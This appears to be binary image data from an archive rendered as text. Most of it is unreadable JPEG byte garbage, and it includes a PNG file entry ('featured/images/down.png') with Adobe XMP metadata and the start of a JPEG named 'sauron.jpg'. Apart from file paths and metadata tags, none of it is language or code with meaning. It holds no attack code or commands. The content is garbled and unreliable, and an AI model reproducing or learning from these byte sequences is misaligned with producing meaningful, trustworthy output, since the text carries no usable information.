�jr��w�`rpI�cל���ϩA����P^4��gq�VA�	`��q�8��;W��w�R�<��]=K$nO�60N����h�^��I�NFK����d�����)�N?�O�:�YW�n�t�3��W�r��'.-��7ǫ�z�x	��roy��`�	YO�k�K��S̗>����O��J�<FO�������9���&�i!PGQ�#���e?m?�fa���d6śԒc��?	��{O�|j��w�A#%�^��903�+L�q���2L1��c�1\���1�}J?m��|���n�D�]��B�oۓ��l���r�<��Z�E�Q�s�?��|p��=��Q�DZ�,����&ۃ|D��u2�v��?.����?h�9�nj�ؖ��n�hv$��j23ǽ.y�$;@�`�|,��_�ف��.�u��_|X]k���d�,�&y�L
��(c%�`�����M.f5��ɦ�vi'�I��^W,ߝSB�qP�矖�K�E�D��<�0^�&����q����Hg�y���sc����_�/4��>0j	os���2�Y`_M߭~��|-���ϨxSm����.��v�����?�k�)�5�E~�?�5/�~�K�_���i/�4�*����۷�X��^�q�o��ڋ���~!�2���Օ�����j��*�SNR�g�w��v��g��[���l�E��C�o���Tbk��ú�e���$���O��zq���_�����-m<9��ƿ|u�>��>�M�+��ƿ�9U��5�?~�_������П�׈�������V �V[�A	�<�ғ���!��a���/$��6�6q��-��gi'v0���8�V��H�ui�'�(�d���s�����۹��<7���~���T���*���x�7S6엒CՏ^0=V� �k��-�
"��:��R����k�t��þ��4���
�Yg�C����%�n�
��W�7y|ѽ��7�6�Ux�����K���5��I��.:?�Z�� �ñ���ooJ談�h�[����u��sx�qm�)	�Cdl�jً�f�q�q_a'��Oo��I7��t���n1ϗ\VF��G�zo�tW��a�޺I~E=��6#m���ݑ_`Zx	�)[|'�Yz��o2�̞AG�6�?®�H�d�O�m>��Y���y��S�/Yͻ��g6�n���~��ۖ�Q,eF>Z���׉<�*��@�kj��SK�
���z��;��1Y����?���q�MP
�	����p�'�J��<+v~b��l��%s����X�ב����m�`�n0�*A���IR���7t��~���@��=|1#�x��V#]O��U":�C!���W�#�_��¹��߳^��_�z���Aj<����Bk;�O�h�!��C �k�G��8>H�jx�ݯ
����bk�+ƥ9r�.��
u`�%t��_��_�|�Zxo�:~��]_Cuwhۡ�6��)#䝮�Ӑy����_t�FL2���~�^�
A8���M�匏�T�C�<�ȪG�X��h��o2_�pU�fV��]\�:�>)�߫&�F��vG��W�.K�:"�`@r�q�q�MwV
�V��@�@���A_P�I��!�i�z�>�%X��5�}KP����V����3��O�-_$s�2ީ�֯���O�qX�u�Cy�$V���1���G����������^G]�o�’ÿ�#:���_�_�e�����������[w�2�9ێ��׵�窭#�+M�E�{� ܻl�>�of
��^�W��\	)F�Tm������V��6���R	$�A���.�ڸcܐx�}9��Kn�\E�������;{�zc=(n�d�&����9
$wJ�J��W$�8���6�2	�8�ݸP�A��8�0).��Z�yjm�Y�f)�j�
0#���XV��M$���i���\��t�ɤ��ᴻ��L��a�C-�p[ q�m$��:�j�Gd`y�����_�K��AϽs�,󿛶�j��a�۱��N�\Wq�n���c��W�u�����lq�9����^��z_ç}�y?����f.#N`#�^���mG�L�m�������q��Q��׮w{v��/�>"MCH�~�L
�Ph��!xٴ������l��8d�Y�a))��7�$t~}��y��j��zrj'�ͫ�p�R&�'�}K�h��G�n.��6��s[�jqđ��[ZI���X�,:dm9�黎s����jP���ckqq<q\�n�7Uh!f���N~l����>�5�����9�a\.펠�v�\��f��[��g��I�xݣ��@������AP�(��+�Q�Z.��[���p̫~��!�*�xW�`Þ��t<V��_"!!�#x��̊T~W��3g`�Y��*�JY]<�r��ͫ�=�qm:p�nR8Q��OdL�s����
�o���^ ��^>��-���� ��K���<�H�y%,��܂�0�{�Z���H�����Һ2���k�>x^8���V&��z�K��g����_��0�ӯn����˪YDIc%�k��<��ٴ�*���{u&���P���$��?�o%P�m�_���6�d_�^�5��ƽ��X���Q���m���Xv��ހ>|��q���hA����+֫�
B��6����i'��������Xg�a��V�rƍ#3d�6G�q�����r
i�ʣ���_��e�u9�n�1��!.v�X�����+����?H�K�m;NӮ�˹;;Y����QIf$�4�z��a�T2��Ϛ@�?�t��BV1����������������Z%��O^mg�~%@��v�I\LN:y�z��B�G���I�����+��^>����o���ui�rm��gE��2�]{=��"��������e���7½ro\ʢ_�'��^��~�(l`�`8��@_�O�O�g���i/�Y�#+#�;�M.��DêK77?P`�_�n��h�졷����oj�a����q�����:l��zX�����|	����xSេ�3�oY.ش��XÜ}���ǻ6I��Dž�ًe�����o�G�/��_JX�;���=kzU���8*��>s��8WY-��P?<����Mϗ$p��Ԩ�����3�ڤ�o����<����Ue)�A�ED�v�r�Ά�rrp8�]^XDq������,<1i+l�9S�J�_��v�x�**��8��DkK
�d����Bb>R�Hz:���b�b1��k����hSrg��q��WE�q�2;��u�t�
��c�c`�O�w���[#!Hv5���=MGS�~���|��/�T�������|!�)h�F#�_Dc��FJa���s�m��#>~����j���V=~Z����1��Jx��t��M��=�<)<&�����#�
�n���8�n�����I��;�)�����O_
�y	���4�F� �����{?�J�N:������g�r`C�?!�K�	5��jPZ�D�+hP��(��du����_F���#���`p�>y��0076ѫ��*�4|�)EL<.��n]�1^��4�Y�O�mę����ǖ��М�8�:4`P{����by�̯�{����Q3�~0kXǨ�G��o�F�?�o��[��u���;��W�pT��������쌪�2�i�.z���?�&��tŻ���c�E�㳈Ƌ��x��HG#���^f�s����]?P;_�#ƨ�g�����=ペ�k-B{ �up�"�������`|�#9oȞ����%K���
�"A�0�nqW�tkv�Ϧ�%�H��y��v���H<\{�}Ns�{M3T���.nY��2���_5��e�S���ǭi��f�]G�E��5²�NF`}npx=�<!=���c��<���o���0�-�Xdq�c\���K�f��6,0]B�n�3 #�r0y��\�|?����K͒6�Y˜�=�ϡ�:V$����?")U���	\�������=�W�j6��Y���Y�-���&N�2�X�=:W��ֶ��]��`�&?�ğ*69'n:ީ4C�V�O��r"��5��p���2�^������kqӿx�L�Z�n�ɇR6�p�ys�n�'5��E�<+��׃u�2���
yd��M۠�2��n��[?}OR=E}��
D�i�����#PP����+2ȃ��4�n��D��t�7�_)�����kK����K=�֋�Br���pFx�r5��]�y7���-й����򁕐��^����/�~,i��ׁ<k���O[�}G�U?i��v���@eb.z�Z�'����}K͒y-����³`!$d�� ��)ݏTz=Ƭcӭ�Ӡ�Wh��YL�w)�`�<}+������d�t��nWl���Ӝ��O��t$�����PQwkym�V��FG����d{�ix�X�.d������ڬЮ�zV�}���*��q���⭤1g��R�)��;!G��2���*+=�Ǒ���"����W���=�~�t��:<3���ӵ�BH�Y?��St����6��5�#*�a��"G�e;9�ҹ];A��d��F>�H������]B�	C�K,�Fצy�	ͬ.I*[w@n���륖��ސcB��(TV�V9>L�6�?+��{�	�Y~��[‘�;�k��o*��&��;o��P�,r�1��K膀>����*���w_j�/��'�k�e��~
�>�wĿ�2��<'��y*G�y��G��U����K�
��5�8���֟�/�~!�l��=��i>Y:�����dPۏP¿~|�=�;���7���
�/j�f��݀Ǚ)EG�w,ǹ4���d��w�,���"��� �
t7	$���j� e�ݝֶ��h�
���fo�'w�)Z�
W�>�c�1�}���uM~|�17�e�S���?ٯ�6�����eF�Ι"�~���ͻ�
%Rk��#°��yOq!:��dP��x��ؕ�4c�!I|�zUO.<g���?ʃ�:s�T�qҥ]8��]1�~Svv)�uf+8��2OsAVG(�f�FG�V�&������V�H4�;���+Li*0	 ��Vr��F����?]�d�
U��1E9>�ۮ��=rz�*O���GC�+9VLޜ�ŧ����QO���T�-u��rUSw<�q�����+��o#���@A� �'�W�:�>̧��})>�:m�ސ��saN��Z_��`Ot�����?SO��q�q����g��S@�N����޴�f��j�G)��?���_���0~�5�}���~4}���hi�Ӕv'�i�N\pH��U�a���0�������/����^�,�{���}�zʏ���?]�܎s���/����tb�I�~�i>ȿ�~)@%&s-����:Gee�cE���$vrd��ر���?�ɽ��q�B�c�
̈́70�2��\8 PW����i�)�>%����q��Z�3���_����n5?��f{�"}��X�v\To�~�F<�����{�i��d[/��i��㞭&��_\,6��|�'�ͅ���=w:��~"�O�o|B�����_-��-w���HdJ�#�P�m	>[�c)��_�	.���]��E�8d�H��#��oon+����;[8���v*��c��t`1�t�ht|�`h�g�n�Ț/銪n.��Fy���z�_��v�#k$U<�i!Y>�Y�����+�\�4f���]�,��4�ƞKi7��C�6����w��u/�:�����#�V��f��&ﺍ"�E�Fs_�)��[w��_��%�}>_i8W����©��8Kn��<Fe��K�H]��5�6�3��o
%�j�a�
m5%��H֣F���f�^;|����`@�!־n��©��?*�SNj=��j�o�8$���:���_�8��ǿ
%� �Z��-o��w]�h�Ҿ!�����i{/�� |�T	���>>�b�YOU�_����_e�:UC����j�~����Q�k�^+��b�	�;G����C�z�u
T��2fʼc��ȯ��������]�O�:݅���i�_>$i~%�FxcEL��&�����=9��g�hK���w��קU?Z腤�a'���	_���?x#U�'�|E�J%���=����G*a����u��/���Qߋ:,P�?<m�kB�-�]����kT 
���k�c$I��L�����G��i!;��8��U��8ގ8���q�+�ˡ���|k�A�ò����m=&��3q���֭L��D��7�q��h�-�+�u��1��ǩ��Mp ��\��y�;�#��iʀ��M>�(p��ePs����W��'�7�߇{¾,���R��%�e���01!T�;6�C�C��Z���O�#l^\`��QE�h�:�+|�ǹ��׊���%��fCI��Ҿd�����N���G=O��5��(����O�WH��G�x�	�f}��ˆ�NJ$N��*���1ź�r��y���S���t��Z�����{˻��Kkx�M,�F�DQ��<3��=�$�m��J]3Xּ����c2������Bpsk��\��9j��J�ɿd��&?�6����+Z"����ٝ[�rq�a{2� 7t�G��~��m�l�4��b~c�v����ŏ�7�G�~�0i��|7?�!��l�x�⽢>�ý������=�f�#l�v�am�h�6zn�c��O���a�FU`S�a�˸��{��"��Ψ���ȋ�6�y�1nZJ�H��G$�*3��C|��W��Y��nI<8�׭&�5p�]2�֭Ud�u��]��j٫�F
ϱP����~E?3�Q3F��x��U���&�:'�	�ү�K6-���A�[~t�D+u&ٷҎdG,ﱗ$�11�
��B�u�?�~��I�EKԶ+Phʌ
'P���*T�5�C.���jJQ%G���[�
�ƒ�?ִ�t�4y�)H��+��jײ������fl|��t���i����e��l�jU{#���d�U@@�dc�	>����P�~�1-�M�?d�8벹Σ8D�����*@ID�g���5���j��n3�ơ�M�Q�krI���֪1r&Nȧ g�7w�4`}��.�~2>�q����
s���,����i�6.}
>Z��붜cA����N��Y����
:��ck?�f��2��Mb�9�����a��Mkg�c?e�?�΁�ߞ��OݚC2|���;K�/��?��j}��?��.?뙥���~�4�'�^�Y��M5�/��ZF�1f��si��O�4���5 3˟R)v�Oz�M:�q�yw�Q��g_ϼ��f�2����Rm�d~�����ɘA	��ξ�ߌF�36���ӄy��V��m����:�x��䎣ʠ€p@���:/�+DX��?e������u�����%5����������-{�g�]2+�Z��O�1��6�Q�7��G�4e��+eX��?�W�?������%��os�xc�q���i,�Ayņ�m��cp�܃_�&��&����W�c�	������u=;��_����'��fm7R+�75��U%A�˨܋]	D��?���N�
+���H,r3��ի��W�L�u�y�W�j�q��@���׵x��	���5�_D����&�I���C�o{}c;D̆H.#B���%]IV\���v��\/�~�e���G��E��.Dy}��]E$K�=��RFc�m������+����t�)�W=	cג~O�W�E�������7�0U�o���,�=�z�w_�M�(�~�/ث��x�|���Qޤvo��G���)����?U������32ȧ�����^y��חA��|�s���N?
�j�	���?��#��~j2z�랽N*ē�	w��d���i��>�;���V����΃�K,S��W^��y��0M{��-
���ym��}���
mm7�W�I���\��	�Ѷ��&>�U��5�o�,���hW]�!�_��O��SN-�L�g��Yݹ��|���=?*ʙYd�IR�gG?��_w��6?�k�����1��:����Ro�&��
N�����w'�6�����Sr�qAI\���Ѻ�[�{�5�$�.���$8�"�����g�A�`��_�y����ߞ��]a]�2?ࡹ;?b��VR�
��m��u�z�[�M��EW�u�Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@��3�ࣿ�t߳'�t
xSQӴ�><��kk��Sg��THѣ}�g�tÑ�ˌ�a�wV��W��`��®ϻ�W�o�_���<o�+�^�ԛn�e����\6q��i�$t��OԴ�Z��.��R��@�]�ܬѺ��YI�����6��~"�ѷ~$����Ğ��s��mB[�]8�]@ֱ#��G��F6�ύ���b���'���_���0�/>�׼W��C���m�[
B��L�u���/��;�(�q�+��^C�c���Mʬ�V�;'��}�>���C��/Z	P]n��k�����U��t�7Yӥ�j�1\Y�?�92�Ȋү�i�|�i���)(��(��(��*��ݭ�����0Y����\�]L#�8�e����MK#�q��v�!fc�~~ߟ��:|%���,�a{�Z��C��5]P[��ш��0��+0@���,v�^��/���/��9�M>�V��]�o�jZF�ͼ�X�l��a����A�_���M_ګ�_|�|3Ӵ{�;X���W7Z��o&�Y��K�(h��$W
��)YX�_�����`��w���X���O�k:~��^�r˪���J��o�7����EU�QEQEQEQE�>3� �M�/�?���G�H˥I�����r˷p��H��ޙۜn��۩���y(�i�m
�߶}~�����d�U�x�
�C�/x����Z�tK�ɩٵ��"�"�E��U�b��Fk�γ�d�
��-�^nǷ��?��m/�T����W����Q��--����MF�������e�X�nWGS�R ���W����o�*���	|:񕝶��x�������Gj��ʃy;#�Ш�T�U$k�e�c��$:�08#�B�GV�ek]^Ǔ^��^QN�m_�-QZQ@Q@Q@Q@Q@Q@Q@Q@���$�ݣ�'UfC������r'�I�[�"|J��q�U��xC�#�7�&{�y,5'�H2��$�`R�3����W�L���ׅ|j����Ꮛ^	��4�
���Z����n�jI���dR����M|���3�xxK�Z5�ϥ�,����N<ѳM-�մ}��g�_������߃�����
&>���׈/!��6�Z�����y��`-�+r�}���|1�W�?������.�<���h��%���Q�e�o1�"ݒW82&O������&�����/�_>	���Ŕ�t�kϥ�Xۼ`\���]��3,�E3>Ѵ�������w~#~ǟ4�ڇ����c㯈���xG��;���;n�(MJ�e�K�`$D�Y�H%~��s�\r��|��ӋwO���>���C��Č�Ò�Z���ﵯ������ß�xKP�ܰ��A��{D�h-T�H!m���%��RH���I�v>_��ߏꖋ~��[�Y��3J�o�.ߚUܹE���A�U����qko:�BVhr��>���5H�z!�(N���a�����V0Q����]�	S���v[�߯��ܜ\�VGk�W�:����N��j�h���ʹ0�C3Z�XA.��4r*�@b��[e����5�aҵ��G7��^I���}�%�;��c+���}.�kˋkh��5��b�P����,�c��A��v&�������с�%_��Y�=y5���c��L�$�W�c���[�;)V�i��=�f;�%l�0��
�bğ��y����5Mt�5�O�X�YM�kh�c*IR�`�c2j� �n$��������?�Ө��O���������O:�6�Ya��K!l[<�y��wL��������Bz̿��yuh��ȉ��b�R�����ǭ~H��f>A��R�����R���M��%�����0~6�2+b��7�~���j�����*:�o�>
��_>#x&��I����
�,,������3ۺDd)�2W1�9�\%�$L�4O�����O�I���(�x�[�E�dz�Z7�u+[]e�����[qm$��;&gc�ir��oD�V��=K�����Q�c�,����Ž$YO�5�I��'��#Z������9�S����w?��3_���sy5�Z���hн�q��<����&	���t�M6���;Y6��T���T�n���卖��Y��;Z[��x�M���I6�y�]4��cY)6c$��Y��A�*��.���x���u��-�ڕ���D�7��	�l\����Ǥ+L7"��k"��i�ggv3�T}�3�c÷6�YM�i�kqna��l�VHI%�lP�|���`A��3�������a
o]��m��g,77�{$��I�E�I�ʢ��u��z.�������<j�w�6J������#r�c`f��AP�l/�ȷ�i.��p�f���i:Z�%��s,���-�	��,[$��➠�g��9�<q�6�u�e�.+�ԝ�o0�X��knBzV� f�LI�?7����Q�moo�{x`3��Na�.���N�5�7���?�щ?����i�PneDg[��UI�1��Mk��0�c�$h�����e�����K�\�V��`�z�CZ����|A���#�~�ᨯ�<��]��#��d6�	-�� ���T��O^��Z������8״�
j���KT�<%��:C�Gqs�P�G:�&�Y�ىLh~\-M��g��5Ox��^iZ���:�B��XX��@�>���"��h��'��K���'��௉cij,).���Gg��WY!�]�1��yVǗ�����;˥C��ko�C��1�*���,���#�T�~�KX�5�u�:9,u����#<m��sՋ�ж��ݓ��;O|C�|yd����گ�f�Q�$0G�F��2Iq
"�%��|�����>*��
���+_�����&�x�0#F�/���a�.~A�=k����simq&��]�=�ǰ����Oػ�u�:h�{5̵<���ë�$��v�+$�wev��b����2p�q�[_��v�7:F��^�m
���<�EM�DiB��I���V�8[H�1n��6	�w�6~��
I��{�4�8�����fH6�X�`t�v�2�5�^�9������j�f��C�[��n&�/�!��Uv$3�8�1q������{o%��*�6��
����U1ݬ�lac�vҸ>�t��J)y8��O��pw~f
�O9�3Nh��afb�|�,�.�3~���]�6}y�OV2�$��������?�Ө�Hn$��������?�Ө�e�:YEف��D{vlK!lGs����l?�$���'����PEPEPEPEP^�����_�k���/�>x���a��1i?~h�;�5�-EėV����i�����4��,�����u_�0��#^;�߂�}���|&�i�?E�ˍ?x���Z�����=���&�H�7*�gc	�͒Ͱ�υ5�+�ߠizƫu��7���Z�I��4���w4>"�{��EA�[�迲��t�ȅl%��C%����k�%��K�N��CB��-7Z�<a��+��m��[��i�CċvӢK7��O!S�,�E�'�m�;���w�!�r4�xE���ْg��־O�|��/+����ni�>h�ů�t����z�Pk�-kM�U�P�/�3$�e�ɭ�.X��.�s<��J�o韞2�[�h~�ռ_�ϊV�zN�5�<+�Ũ���<j`[�e�f�y~�,�	
�C;�2,ym��Y�fi����Gŏ��d�N���-iv�k�K⥿�G7��C|G6Q�<q�嬏2�}1�U�*��ŷ�>뚟�]*�O�"��}k��l#)i2BV+v��x��y�HA`
vc�e�����Wk���x�I��]�.�D��Kmuk+]����[�Z�,d�c��C����r��o��m��|e��_�
��w�_��=v���~$��G��-&��wMi�Bֱ���)C��)oHӴ�Xf>.��E>|)�~���Z����7��&�Ԥ��-6�@�uxt�.�2K#�[�������@�\Dg�wպ�߂~'�O�|I�ᆽ��Ԯ���x��ͮ5����L��q12J�̎K9'�n���~��A�
_��½S^���4�mkP�}a5�zm���kh�4%���	0v�F��S�O�b���_�>
ҿ��Ϊ�$�o�A��~JxoB��V��Z�č����Eq��?13�H�F��\$=��)��O�:����#D�}���/�.��|�]G���=ϱ�H��N���o,�,ӨB|C���f�zN��x���K�'H�&���:�vQEq%�ٲAr�Kl�I�H_)"Y۫"M���6�о*xw���D�_�<%�h��F����ui�e�."��5i������l��l��A}�o�[�z_����x/�
��+�^)մ{��F�w�i��6�
ޓ��i����Z��K�x��Zg��1�"u1W�~��Q��Ϗt�������Z׆f�t[�������O�5�<7����|M��(tPVf\�#xǿ'�3%ŭ���Ի�Z���|(�Đk�"�ڌm�|�ђ4s0���S� V���>���?>ys�6��+}?d
j�klc_'
b]'JF6P��c��z�[+7��
��(��z�W������h�'�/�>	�o�<=�O	�o��sE��h�U,!�UwmD�E��i��u�^��OL���f����=Ɖcg��0,��麆��v�+n�(��c�Č�Aq����W�?��టl-l5_��	<M�����z���B�(�aqo�[��O��i�����&o�����?b[�?�_��^���:�K���=ݤ7_~�����N����u��zx���[*p!�5}V//�w�K��Hd�}��$|O�����]����M[�?�m�&|$���1���kM.�����_���c}E��v����i#�Y��:4����
��3x[�>3𞫣�P��?|ek����C�4�R;��W���{�mBHL6��}~9�9�&�x�N���u������Iվ	|$��	�{P�</�jt����*�����6��6��4�I�$��b+&�\��t�՟O���ض�p��mg�K��J�\��1[q�1�P�"%�v]ν$p[�o��������6��g�w�q��~񿇼/�/����������X�o��;�x��p��	I"���(8����F>x��?����4xC�߀�g�|L��>2�͝�j^��ԣ����;Ǹ�E�h�KK�Ǹ���Z~�_�,W�j��<|MN��ͭ[jK�K�
'���'��'�f~�s�k�_����sd>|6��è<#yi�=��7���h��VO�M.�S��6�4�<����j_��>*��l>/x����υ����@�߇�?�^��.5H|,&k[�#�k[�i1ʪ��c>lr�w��x��I�-��<]���—W��u���C����Cv�٬rJ���i�����U��_�	�f���L�E���Z�F��!�I��~�%�D�bئ#ݣ�I���-q��=�b��?g�[{Kh�|����a��>��0���"'
�Tǁ���z)[Tڞ���I�i�����^��4�u�Fg�gP�9n�s���r�j�R�t�;FӬ4}��J�t�(���3M�Xm���P��j�*�P�U�g$y�ޠ�Ţ�(9��K�\�V��`�z�CZ͛�T��Ϳ�i^��&���5��l�������M�M��D�u�x�[��n>#��5��#Z-ƫq���<�-YQ����^,?�?�E�������L𶡩x���
��6�%���i����u�f��5?%��n!@]d���O���x��~�#�����<K��|��_[���J%V�O�R(�Db��$Ws�<|���Y��!��VH��u;��{�l��k���L;�-ĒJ�?<���bM$����Ri�e���?��G���)��M�m�f�-W�>.��jR�%��vWs]�����[�d�<����,R����Z�fOL𦷥xs㞭�x��^Ѽ7�i�e���|;�qƳy�M*��{��̦U�!4�m}��3ப<~5?�?5�����Eo�c7�$�o��T��a�g��n8�R��{�	����s���?�G��Y��N��
�O���ig���0�;c���m�U��5!QV�?��!�~�?�.x�
C�;����[�o�|)�lj���4=k�����v��i<=���7��8��H�
�*a���
+��+��L΁��d��A�5���l�n�t�~dΓ��v�mͳL����-��T�3�\կu�k�oÝ_]�/�ը�ڧ���.�.7X��$�f}�&�ۉ�t�C��G�����g�A��|���p֓&���<�{�iW�\�"��<v�b�=�G�v�8#���ʻ�-�=�����~���a���e߄�3��X�x��F��?Z�ӼCo����L2�v�qJp�ckss�|�����_� i6��'��3>��k_\��V�o�x�	�uy�!r��f�@eY�f^5.�}���࿂~�%�U��7�x�V�ec�E��h���k`����+2M�9����d�P�C�Y���}�f�&�����-�Jt�6��߆�u���wbZ(�U���Y��r�����	��~���|���[>x�kQ��>=�.��ޗi�x���N�E����>����{�����Vw���K��+�	-����_�>�'������ɥ�l�a���wY�O�&�q41\������-p,���8Z)�/���{�i��zDZ��CC��mq�&��K�[)�kY�H@<�3i�t��}�
�$+b�j����$��߀��9%�DӬ~�B�=ŵ��#X1��N����=�rcB���CS�_�_	��	�����oi�u��j�Z���^)!���M�:<bFh�Yk�(���<%�	�úg�<
��7š,L�?�|+�C�����
�*�.��(f'�5��;\	�?�$���'����W;a�!%��9?�%���Q@Q@Q@Q@z���?�����>(�5׼G�Y5�#���9�M����&���ỒY��s�/n/"���cM��$VU#�W�L����;?��<��ן���������^��ol�I"K
I�4�r>V�oVڸM\.�<_���4�A
���]��B���uk��L��q$�#�@݅��(B���4��$}�����Σu6��^x�Ñ��G�����7�A���P�n��y�ۮ-r�<Fb���U�n���[o�����dK�z��F����e�%����O��9g�@[z7�o�E�/5�<S|ږ�y����Wv�E-�Ŕ�eN-�)�s)e ��d�3��k܋��H���n��jA��k�^5�����Ʃ�
�N�v��i��iʐ"�c�{��",&܄<�T.Ho���~8i���'�?{�M����M�Mgu-��o.�Q5��rm��=���iVBI����?g��mwW�bֵ
b�R�f��{{ˈfV12[�Цve�*R<���?����?�&�ĺ����xn��f��s�u�q[&вGȤ!+沙��h�'.^�~ln�̄�Ͼ>�A����q��ַV��q�#�l��m^��lq�[��H��RH��F�gĝ7��Zw�!����K/����P�U�E�ﴩ-m�Hd�a%��vw��4,�#��_C�c߄� �.����%���kZ���sgwl�k��?*E�e�p�4."ly��tc����9"މ58�ִ���m���5�G�/�En-��LL��!7G����k��"�ÿ��|oa�O��5CQ�]J���,_����o1�q)X|�Ĩ�?-�n�����K~���՝����{Q��m�9�.���/RS#���,�66�LmX��
�[�o�x��~<{�j�2��u-Y<E�=��]^_�s8[e]�L�a<�6M�wVl���ox��۞6��a��7M�|@uX�%��k���sGl�x�E�U$��Q����_�)9Szo�E
����kj?l�h	�=���[kY�|�n�+6o��u���0��L���կyi2\Ium�L�U�<��s_韰�}.���
K�R�o�����j��#���]Ũc&����� �x[����>���ɓ�i�K�nO6�����$B��$5�I\,lG�u�o�u�����)c�8�D�P4R�ᕔ�#�>������{C��=s��k��D�,ZG��4�{;G�8Ռpƨ��j�p����=3�>�����	�1�tr^*�g��hV���u��]Z[k�c��kUE�#�D,U����q;h�m��i�mկ�#���7M��%�?f�a��`�ıݕ�i%w����^-����՚�4�i�Zv��u�[�-�ͪ�!�U!�}�p��8"�`����_C����tɠ��mg��*�œ#Cr�"9vs�Q����FIzM�ds�8|`����u?���z������ ���<&�\���'<R��v�C��DZ#�Ÿ>&�����[��%��f[��[in������9�--�R6I.�3+,��T�>A�I�|��״q������!7�5�2��%d�Cy��}�(�@��~Ɵ	5-7�Z}�lj����jiwv�cm%�^_���:�h��~t��%�~��'��h��wu�3�"�ϟ�n4�7H��u�°|&>ּ?q��]�jjO��\\-�ry�H!�଍$d���~|T�.,�Q��d�#��,m|)e�#G%���+}���
����b���-Y���u�m<u�i֚���_|=�D���+Z��I�c"9��V�K��K"$o�-��e�0|,�� �d��������^�Z���_[Y��$�+��~�Qc\�����9;����b�T�����y�)�?����Q^�Z��k��g�[i�͗e�[X�����������Wdy�հ�5�?�7��
o�����?�f���>�Q���E��/�K�]���[&֚P
��:��:�b?�1��CR��h���sf��S9��|J�5�w&o��'�U��r$?��-�6�W�Ϻ�T�ƛ{�\jƃ{ud�z��۴;.��*$rK�͹��5���n	E�]��}�������|0��F�Fo�~!����f����Rm�u�^�[���h!��B�q�ij�{�N��~�jZϋ!�?����u��Go8�PO�:�vl!_��O:Mޟ7��[�9����>�0�ivSZ*�Z޵��CpZ��V���]�>A]�Y1�G����ď\x�^�|y�y��aa�Zg�-��-d�x�2���� �WK�Q���#�v����G��(�	����"�w��cQ��h�Ɇ6��C�M�"��$ij���/��ذv����?=|�-J�m��t�hz��p���[{���s]X��R��mNx�# o�bX�a�;JY
��#L�(���~�}��t�_�+�֦�f��b��g=��񫘼��h��
��X�9Z���p��T��Ϳ�i^��&���5�ٿ�K�\�V��`�z�CZ���_�j�'լ��3�:g��C�M��U�他��yUc���;�LH�,.�.��#x�,�K���n-cM7���v�xtE���k)&�H�1y�#�a�8;��y&C�/�|Q����k�:O�<Qs�H�
HkH�XC�n#�6�F+ h��
�W!�a6y���M_V�=ߊ�i{����_7�汒6���n��(�����?Փ�L�֬����^��9�I�T��j?�׎l���#�Ԛ���-`[�����!��p^Khbv[T'����!��N�`��~���(>�Zg�&����ut�5�ڌ�y$����em���/�do����M:��7:���jWv���լд�pK��ٷ�m�ِ8�L���X�T��/�7��b,���^{i!ӿ�����cx픬$[��}�=�ve\&�Zn.��In)�v8��>8Y�%���"�C�h:|�'�t{�{������R��#c4s�ſ�X���3�WSk��$z�����J{���m6I¥�[���o�1��ld+@���Lu��I�Y�xK���Y|C��W�ZN�}gu-����V�4il?v��d	�y��R9�<C�+|/��/�.�-u�u[�u%����]��&��h �+)��oB�*H�ɹ|��0P���i��|�K�O�}s���P��g�j^E�����-�"��=�HZ�ݜ�ϙ����Ǟ�<�/~�:���E�x�9u�K�V�f��j����?|�G+��8�RUXYo�k��_,�>5x�W��d���y�ٴ���bW�럖Q��W�~�_��K��Է>#�<C�+�=���2��w��^Aso�lb��I†�X�0l��m�H�k����U�c�q��^����j?�����#��,m<wb���WR���)Kԙ�3�mG�H�c�#ʏ��%�ş��L��%m1u�-G�6����`�2\}��o��2Cx����Hd�9�)"t6�����<_|�Nj�5ŧũ�R�ڭ�6�}�7|0L���5���Kc!wÏ8п`߃��K]WǷ2Xj��C5�fdi#�`!�m�c�0��h6�n�o�~k�_/����z�k}��)>�T3y�=?<�Kk�k�k{�+�.���Y-n�fG$l2��8e ��_*Z��l��_D�_�izϊt=R{8�8�,�\M�a��e�Rc�xR����ϡ�	��#�߃<+�/���>�����$[[h�q��W!UFB���W�Ɯ����BK�^r�K]s��_��BZ�QEQE��featured/images/down.png000060400000002010152434416630011262 0ustar00�PNG


IHDR�j�	tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:4241B4DE57E111E69C5EE438F80BF0D5" xmpMM:DocumentID="xmp.did:4241B4DF57E111E69C5EE438F80BF0D5"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:4241B4DC57E111E69C5EE438F80BF0D5" stRef:documentID="xmp.did:4241B4DD57E111E69C5EE438F80BF0D5"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>w��PLTE���Mh������Nz�����1c{������@:�RIDATx���A� @�U������ٽ1� 1�}=r$?p���*���纐�N� C�|UѢV��*d?l�*V�� ?���¯s�IEND�B`�featured/images/sauron.jpg000060400000206642152434416630011637 0ustar00���JFIF``��fExifMM*>F(1N``paint.net 4.0.9��C��C��,�"��	
���}!1AQa"q2���#B��R��$3br�	
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz������������������������������������������������������������������������	
���w!1AQaq"2�B����	#3R�br�
$4�%�&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz�����������������������������������������������������������������������?��(��(�����0?����d���?�ji6.i�2�O�R
���I-�)(��c���%���d�,���Z�y->��Q����[�~����%��0\�K�
����m� �FX��m|���Yt��8���g��+�sj��\�M�7�D���j����c�٧��&"=���
�JteingJ�+F�����4?lۿ�߳>��?E�|�o���?�m���n��&����9��du�����ݹP��+�O�)��?êx_�~������
��g��%�^/�:�ey�Ew{}��s�e��;�P���A�g;s5?fh�����Q�������i�>i�7�����|sᏃ�'�P�Լ5��چ���	�W�K}"�M��1t]���ؿ���c�ڗ��3hz��߇:��m����ַ��;]E�h�A�H��h#�+DC�l���(��+��_����?���k�~&Ѯ�u
